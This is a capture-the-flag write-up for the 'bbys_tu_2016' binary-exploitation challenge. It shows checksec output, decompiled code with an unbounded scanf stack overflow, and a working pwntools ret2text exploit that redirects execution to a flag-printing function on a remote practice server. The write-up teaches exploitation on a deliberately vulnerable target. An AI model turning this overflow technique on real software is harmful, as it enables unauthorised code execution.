
bbys_tu_2016

Ubuntu 16


0x01


checksec

[*] '/home/zelas/Desktop/pwn/bbys_tu_2016/bbys_tu_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //
PIE: No PIE (0x8048000)

IDA

main()

/* Decompiled entry point of the target binary (IDA output, kept as-is so the
 * stack offsets in the side comments stay meaningful).  Prints a prompt,
 * reads one whitespace-delimited token from stdin into a 4-byte local,
 * prints a second line and returns 0. */
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [esp+14h] [ebp-Ch] BYREF -- 4-byte local that scanf writes into

puts("This program is hungry. You should feed it.");
/* BUG: "%s" carries no field width, so scanf stores the whole token plus a
 * terminating NUL into a 4-byte object -- an unbounded write past v4 on the
 * stack.  The checksec output above reports no stack canary, so the saved
 * frame pointer and return address are reachable from this write.
 * Fix: read into a real char buffer with a bounded call, e.g.
 * `fgets(buf, sizeof buf, stdin)`, or give the conversion a width that is
 * smaller than the destination. */
__isoc99_scanf("%s", &v4);
puts("Do you feel the flow?");
return 0;
}

可疑函数printFlag()

/* Decompiled helper (IDA output, kept as-is).  Not referenced from the main()
 * shown above -- whether anything else reaches it cannot be told from this
 * page.  Reads the first line of flag.txt, prints it, and returns the
 * fclose() result. */
int printFlag()
{
char s[50]; // [esp+1Ah] [ebp-3Eh] BYREF -- line buffer; fgets is bounded to its 50 bytes
FILE *stream; // [esp+4Ch] [ebp-Ch]

stream = fopen("flag.txt", "r");
/* fopen() is not checked: with flag.txt missing, fgets() receives a NULL
 * stream (undefined behaviour, in practice a crash).  fgets()'s return is
 * also ignored, so on an empty file puts() prints an uninitialised buffer. */
fgets(s, 50, stream);
puts(s);
fflush(stdout);
return fclose(stream);
}

0x02


思路 ret2text

0x03


exp

# Author's proof-of-concept for the unbounded scanf("%s") shown in main()
# above.  pwntools script: needs the `pwn` package and a reachable target.
from pwn import *

# 32-bit x86 target; debug log level prints every byte sent and received.
context(os='linux', arch='i386', log_level='debug')
# Remote instance used in the write-up; the commented lines below are the
# local-process variant of the same setup.
io = remote('node4.buuoj.cn', 29910)
path = './bbys_tu_2016'
# io = process([path])
# elf = ELF(path)
# libc = ELF('./libc-2.23.so')

# Fixed code address (binary is non-PIE per checksec); presumably printFlag()
# as found in IDA -- the page does not show where the value comes from.
get_flag = 0x804856D
# Bytes from scanf's destination to the saved return address, per the
# author's stack analysis (not derivable from the decompiled offsets alone).
padding = 0x14 + 0x4
payload = flat(b'a'*padding, get_flag)
io.sendline(payload)

io.interactive()

